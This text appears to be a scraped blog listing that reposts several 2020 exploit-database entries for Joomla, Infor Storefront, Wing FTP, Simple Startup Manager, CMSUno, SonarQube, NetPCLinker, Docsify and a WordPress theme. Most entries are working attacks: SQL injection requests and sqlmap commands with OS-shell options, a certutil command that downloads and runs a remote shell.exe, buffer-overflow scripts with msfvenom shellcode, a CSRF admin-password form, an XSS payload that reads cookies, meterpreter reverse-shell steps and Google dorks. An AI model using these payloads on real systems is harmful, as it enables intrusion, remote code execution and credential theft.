    # Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection # Date: 2020-06-17 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Vendor Homepage: https://joomsky.com/ # Software Link: https://joomsky.com/products/js-jobs-pro.html # Change Log (Update) : https://joomsky.com/products/js-jobs.html # Version: 1.3.0 # Tested on: Kali Linux - Apache2 Vulnerable param: sortby ------------------------------------------------------------------------- POST /joomla/administrator/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/joomla/administrator/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 233 Connection: close Cookie: COOKIES Upgrade-Insecure-Requests: 1 js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1 ------------------------------------------------------------------------- sqlmap poc: sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby Mehmet KELEPÇE Penetration Tester | Red Team
  18. HireHackking

    Infor Storefront B2B 1.0 - 'usr_name' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection # Google Dork: inurl:storefrontb2bweb # Date: 2020-06-27 # Exploit Author: ratboy # Vendor Homepage: https://www.insitesoft.com/infor-storefront/ # Version: Infor Storefront # Tested on: Windows All Versions [POC Multiple Vulns] python sqlmap.py -u "http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass" -p usr_name --dbms=mssql --level=5 --risk=3 --tamper=between,space2comment -o --random-agent --parse-errors --os-shell --technique=ES python sqlmap.py -u "http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1" -p itm_id --dbms=mssql --level=5 --risk=3 --tamper=between,space2comment -o --random-agent --parse-errors --os-shell --technique=ES or... http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL INJECTION];-- http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL INJECTION];-- -- Sincerly, Aaron Schrom
  19. HireHackking

    Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated) # Date: 2020-06-26 # Exploit Author: v1n1v131r4 # Vendor Homepage: https://www.wftpserver.com/ # Software Link: https://www.wftpserver.com/download.htm # Version: 6.3.8 # Tested on: Windows 10 # CVE : -- Wing FTP Server have a web console based on Lua language. For authenticated users, this console can be exploited to obtaining a reverse shell. 1) Generate your payload (e.g. msfvenom) 2) Send and execute via POST POST /admin_lua_.html?r=0.3592753444724336 HTTP/1.1 Host: 192.168.56.105:5466 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.56.105:5466/admin_lua_term.html Content-Type: text/plain;charset=UTF-8 Content-Length: 153 Connection: close Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5 command=os.execute('cmd.exe%20%2Fc%20certutil.exe%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.56.103%2Fshell.exe%20c%3A%5Cshell.exe%20%26shell.exe')
  20. HireHackking

    Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC) # Exploit Author: PovlTekstTV # Date: 2020-07-15 # Vulnerable Software: Simple Startup Manager # Software Link Download: http://www.ashkon.com/download/startup-manager.exe # Version: 1.17 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit) # DEP and ASLR Disabled on system # Space for shellcode: 264 #!/usr/bin/python # Two sets of instructions are needed: # 1. JMP EDI # 2. JMP EBX # I found these in the OS-module: SETUPAPI.dll, which is usually protected using ASLR # The exploit will properly not work unless changed/bruteforced. # It is also possible to overwrite the SEH-handler with 600+ bytes, # however I did not find any POP, POP, RETs. # Walkthrough: # 1.- Run the python script, it will create a new file "exploit.txt" # 2.- Copy the content of the new file 'exploit.txt' to clipboard # 3.- Turn off DEP for startup-manger.exe # 4.- Open 'startup-manger.exe' # 5.- Click 'New' or go to 'File' and click 'New' # 6.- Paste content from clipboard into 'File' parameter # 7.- Click on 'OK' # 9.- Calc.exe runs. #Identified the following badchars: x00 x0a x09 x0c x0d x3a x5c #msfvenom -p windows/exec cmd=calc.exe -f c -b "\x00\x0a\x0c\x0d\x3a\x5c" shellcode = ("\xdb\xd0\xd9\x74\x24\xf4\xbe\xcb\xe3\xc2\xa5\x5a\x33\xc9\xb1" "\x31\x83\xc2\x04\x31\x72\x14\x03\x72\xdf\x01\x37\x59\x37\x47" "\xb8\xa2\xc7\x28\x30\x47\xf6\x68\x26\x03\xa8\x58\x2c\x41\x44" "\x12\x60\x72\xdf\x56\xad\x75\x68\xdc\x8b\xb8\x69\x4d\xef\xdb" "\xe9\x8c\x3c\x3c\xd0\x5e\x31\x3d\x15\x82\xb8\x6f\xce\xc8\x6f" "\x80\x7b\x84\xb3\x2b\x37\x08\xb4\xc8\x8f\x2b\x95\x5e\x84\x75" "\x35\x60\x49\x0e\x7c\x7a\x8e\x2b\x36\xf1\x64\xc7\xc9\xd3\xb5" "\x28\x65\x1a\x7a\xdb\x77\x5a\xbc\x04\x02\x92\xbf\xb9\x15\x61" "\xc2\x65\x93\x72\x64\xed\x03\x5f\x95\x22\xd5\x14\x99\x8f\x91" "\x73\xbd\x0e\x75\x08\xb9\x9b\x78\xdf\x48\xdf\x5e\xfb\x11\xbb" "\xff\x5a\xff\x6a\xff\xbd\xa0\xd3\xa5\xb6\x4c\x07\xd4\x94\x1a" "\xd6\x6a\xa3\x68\xd8\x74\xac\xdc\xb1\x45\x27\xb3\xc6\x59\xe2" "\xf0\x39\x10\xaf\x50\xd2\xfd\x25\xe1\xbf\xfd\x93\x25\xc6\x7d" "\x16\xd5\x3d\x9d\x53\xd0\x7a\x19\x8f\xa8\x13\xcc\xaf\x1f\x13" "\xc5\xd3\xfe\x87\x85\x3d\x65\x20\x2f\x42") payload = shellcode payload += ("A"*(268-len(payload)-4)) payload += ("\xe4\xa9\x4e\x76") #0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll] payload += ("\x5f\xbc\x4e\x76") #0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll] #Write payload to file file = open("exploit.txt" , 'w') file.write(payload) file.close()
  21. HireHackking

    CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password) # Date: 2020-05-31 # Exploit Author: Noth # Vendor Homepage: https://github.com/boiteasite/cmsuno # Software Link: https://github.com/boiteasite/cmsuno # Version: v1.6 # CVE : 2020-15600 An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password. PoC : <html> <body> <script>history.pushState(",",'/')</script> <form action=“http://127.0.0.1/cmsuno-master/uno.php”method=“POST”> <input type=“hidden” name=“user” value=“admin”/> <input type=“hidden” name=“pass” value=“yourpassword”/> <input type=“submit” name=“user” value=“Submit request”/> </form> </body> </html>
  22. HireHackking

    Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Title: Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path # Author: Velayutham Selvaraj # Date: 2020-06-03 # Vendor Homepage: https://www.sonarqube.org # Software Link: https://www.sonarqube.org/downloads/ # Version : 8.3.1 # Tested on: Windows 10 64bit(EN) About Unquoted Service Path : ============================== When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). Steps to recreate : ============================= 1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] 2. The Vulnerable Service would Show up. 3. Check the Service Permissions by typing [ sc qc SonarQube] 4. The command would return.. C:\Users\HP-840-G2-ELITEBOOK>sc qc SonarQube [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SonarQube TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\wrapper.exe -s C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\conf\wrapper.conf LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : SonarQube DEPENDENCIES : SERVICE_START_NAME : LocalSystem 5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine" 6. Now create a Payload with msfvenom or other tools and name it to wrapper.exe 7. Make sure you have write Permissions to where you downloaded. i kept it in downloads folders but confirmed it in program files as well. 8. Provided that you have right permissions, Drop the wrapper.exe executable you created into the "C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\" Directory. 9. Now restart the IObit Uninstaller service by giving coommand [ sc stop SonarQube] followed by [ sc start SonarQube] 10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege]. During my testing : Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o wrapper.exe Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]
  23. HireHackking

    NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) # Date: 2019-06-28 # Exploit Author: Saeed reza Zamanian # Vendor Homepage: https://sourceforge.net/projects/netpclinker/ # Software Link: https://sourceforge.net/projects/netpclinker/files/ # Version: 1.0.0.0 # Tested on: Windows Vista SP1 #!/usr/bin/python ''' # Replicate Crash: 1) Install and Run the application 2) Go to second tab "Clients Control Panel" 3) Press Add button 4) Run the exploit , the exploit creates a text file named payload.txt 5) Copy payload.txt contents into the add client dialog , "DNS/IP" field 6) Press OK . Your shellcode will be executed by pressing OK button. ''' #msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36" #Bad Characters : \x0a\x0d\x33\x35\x36 shellcode = ( "\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1" "\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96" "\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b" "\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86" "\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef" "\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23" "\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62" "\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc" "\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10" "\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74" "\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55" "\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1" "\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe" "\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4" "\x44\xbf\x0f\x56\x04\x40" ) egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" nSEH = '\xEB\xAA\x90\x90' #Jump Back # (Vista) # PPR(ecx) : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe) SEH = '\x67\x4b\x49' offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50) payload = offset+egghunter+"\x90"*50+nSEH+SEH try: f=open("payload.txt","w") print("[+] Creating %s bytes payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  24. HireHackking

    Docsify.js 4.11.4 - Reflective Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting # Date: 2020-06-22 # Exploit Author: Amin Sharifi # Vendor Homepage: https://docsify.js.org # Software Link: https://github.com/docsifyjs/docsify # Version: 4.11.4 # Tested on: Windows 10 # CVE : CVE-2020-7680 docsify.js uses fragment identifiers (parameters after # sign) to load resources from server-side .md files. it then renders the .md file inside the HTML page. For example : https://docsify.js.org/#/quickstart sends an ajax to https://docsify.js.org/quickstart.md and renders it inside the html page. due to lack of validation it is possible to provide external URLs after the /#/ and render arbitrary javascript/HTML inside the page which leads to DOM-based Cross Site Scripting (XSS). Steps to reproduce: step 1. setup a server (for example I use flask here, for the POC im hosting one on https://asharifi.pythonanywhere.com ) step 2. the server should respond to request to /README.md with a crafted XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1 onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>" also the CORS should be set so that other Origins would be able to send ajax requests to the server so Access-Control-Allow-Origin must be set to * (or to the specific domain that you wanna exploit) example code below: ------------------------------------------------- from flask import Flask import flask app = Flask(__name__) @app.route('/README.md') def inject(): resp = flask.Response("Html Injection and XSS PoC</p><img src=1 onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>") resp.headers['Access-Control-Allow-Origin'] = '*' return resp ------------------------------------------------------ step 3. craft the link for execution of the exploit for example for https://docsify.js.org website you can create the link as below https://docsify.js.org/#//asharifi.pythonanywhere.com/README (note that the mentioned domain is no longer vulnerable at the time writing this report) when a user visits this URL an ajax request will be sent to asharifi.pythonanywhere.com/README.md and the response of the request will be rendered inside the webpage which results in XSS payload being executed on the page. snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099 Mitre CVE entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680
  25. HireHackking

    WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection # Google Dork: inurl:/wp-content/themes/nexos/ # Date: 2020-06-17 # Exploit Author: Vlad Vector # Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ] # Software Version: 1.7 # Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242 # Tested on: Debian 10 # CVE: CVE-2020-15363, CVE-2020-15364 # CWE: CWE-79, CWE-89 ### [ Info: ] [i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection. ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS [x] SQL Injection ### [ PoC Unauthenticated Reflected XSS: ] [!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E> [!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1 Host: listing-themes.com ### [ PoC SQL Injection: ] [!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4 [02:23:33] [INFO] the back-end DBMS is MySQL [02:23:33] [INFO] fetching database names [02:23:33] [INFO] fetching number of databases [02:23:33] [INFO] resumed: 2 available databases [2]: [*] geniuscr_nexos [*] information_schema [!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8 Database: TARGET-DB Table: wp_users [9 entries] +--------------+------------------------------------+-------------------------+